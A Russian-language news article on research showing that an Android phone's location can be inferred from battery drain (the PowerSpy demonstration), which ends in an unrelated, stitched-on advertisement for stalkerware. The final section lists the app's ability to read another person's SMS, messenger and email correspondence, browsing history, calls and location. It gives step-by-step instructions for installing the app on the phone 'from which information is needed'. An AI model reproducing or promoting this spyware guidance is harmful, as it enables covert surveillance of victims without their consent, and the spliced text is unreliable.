Расход батареи может указать на координаты Android-смартфона

20150302_3_1

Многие владельцы мобильника на базе Google Android считают, что их информация находится в полной безопасности. Казалось бы, для этого достаточно следить за правами, которые предоставляются различным приложениям. А также за посещаемыми сайтами, дабы не подхватить мобильный вирус. Группа специалистов из Америки и Израиля работали над совместным проектом, призванным помочь в обнаружении слабых и уязвимых мест современных смартфонов. Ахиллесовой пятой Android оказывается не только её программная защита и открытая архитектура, но и аккумуляторная батарея!

Исследователи из оборонной компании Израиля и Стэндфордского университета установили метод, который позволяет найти мобильник без Интернета, без каких-то приложений, а опираясь исключительно на расходуемый заряд аккумулятора. Отмечаются затраты во время мобильных разговоров, и именно израсходованная энергия даёт понять, на каком расстоянии располагается ближайшая вышка сотовой связи.

Алан Вудвард, один из ведущих программистов в проекте, выражает опасение по поводу будущего всей индустрии. Технологии подошли к моменту, когда самый надёжный способ уберечь информацию в мобильнике от утечки – не приобретать смартфон вовсе! Пока нет ответа на вопрос о том, можно ли косвенно прослушивать телефоны подобным образом, поскольку используемые алгоритмы несовершенны и отличаются высокой погрешностью. Но эти детали будут прорабатываться в будущем.

Новость может многих шокировать, но не всё так плохо. Чтобы рядовой злоумышленник мог отслеживать батареи телефонов конкретных людей, ему потребуется собрать немало информации. Во-первых, нужно нарисовать полную карту «энергетической» местности, отметив все вышки в радиусе города. Замерить точные показатели ему никто не позволит. Во-вторых, необходима самообучающаяся программа, которая будет адаптироваться к обновлённым координатам сотовой сети. В-третьих, важно учитывать и близлежащие вышки Wi-Fi.

Технология была продемонстрирована при помощи специальной утилиты PowerSpy. При установке в Android-смартфон приложение всего лишь запросило информацию о расходуемой энергии аккумулятора, а также доступ к Сети. Подобные требования вряд ли смогли бы насторожить современного мобильного пользователя. Демонстрация велась с использованием модели Nexus 4 от Google. Но исследователи не сомневаются, что и смартфоны на iOS могут иметь аналогичные уязвимости.

Следует добавить, что PowerSpy – уже не первая экспериментальная утилита подобного рода. Есть ещё SurroundSense, которая протестирована специалистами NASA. Приложение анализирует поступающий в мобильную камеру свет, а также записывает звук. Анализ двух типов данных позволяет говорить о том, находится ли телефон в движении. Есть и утилита Gyrophone, основанная на показателях гироскопа, который есть почти в каждом современном смартфоне. Точность данных пока не велика, но даже эти исследования должны насторожить пользователей.

Возможности приложения: чтение переписки SMS, MMS, Вконтакте (официальное приложение и Kate Mobile), Одноклассники, Facebook, Мой Мир@mail.ru, ВСети.by, Twitter, Hangouts, Google+, WhatsApp, Skype, Viber, Hangouts (бывший Google Talk), Агент@mail.ru, ICQ, IM+ и IM+Pro, AIM, Jabber, MSN, MySpace, Yahoo! и Я.Онлайн (Яндекс Чат), Email переписку Gmail и Почта@mail.ru, просматривать посещенные сайты в браузерах Chrome, Opera, Firefox. Получить доступ к списку звонков и местонахождению телефона. Это малая часть всех возможностей. Весь список возможностей доступен тут

Видео руководство по установке для любого телефона:

Видео руководство по установке на телефон с ROOT правами:

Инструкция по установке и настройке:

  1. Заводим личный кабинет по этой ссылке: «Завести личный кабинет» (просто регистрируемся там).
  2. Заходим по этой ссылке: «Войти в личный кабинет на сайте» и вводим Email и пароль, которые указали пре регистрации.
  3. Жмем кнопку: «Добавить телефон»
  4. Заполняем все поля которые просят ввести. Заполняем правильно как там написано, иначе не будет работать.
  5. Жмем кнопку «Сохранить».
  6. Читаем инструкцию которая появилась после нажатия кнопки «Сохранить»
  7. Устанавливаем на телефон, (тот с которого нужно получить информацию) приложение, и настраиваем его согласно инструкции, которую вы должны будете прочитать на шаге 6.
  8. Приложение установлено. Все хорошо. Разработчики пишут, что надо подождать не менее часа, чтоб данные начали поступать в ваш личный кабинет который вы завели на шаге 1. В нашем случае данные пришли через 4 часа. Задуманное удалось! Желаю успехов.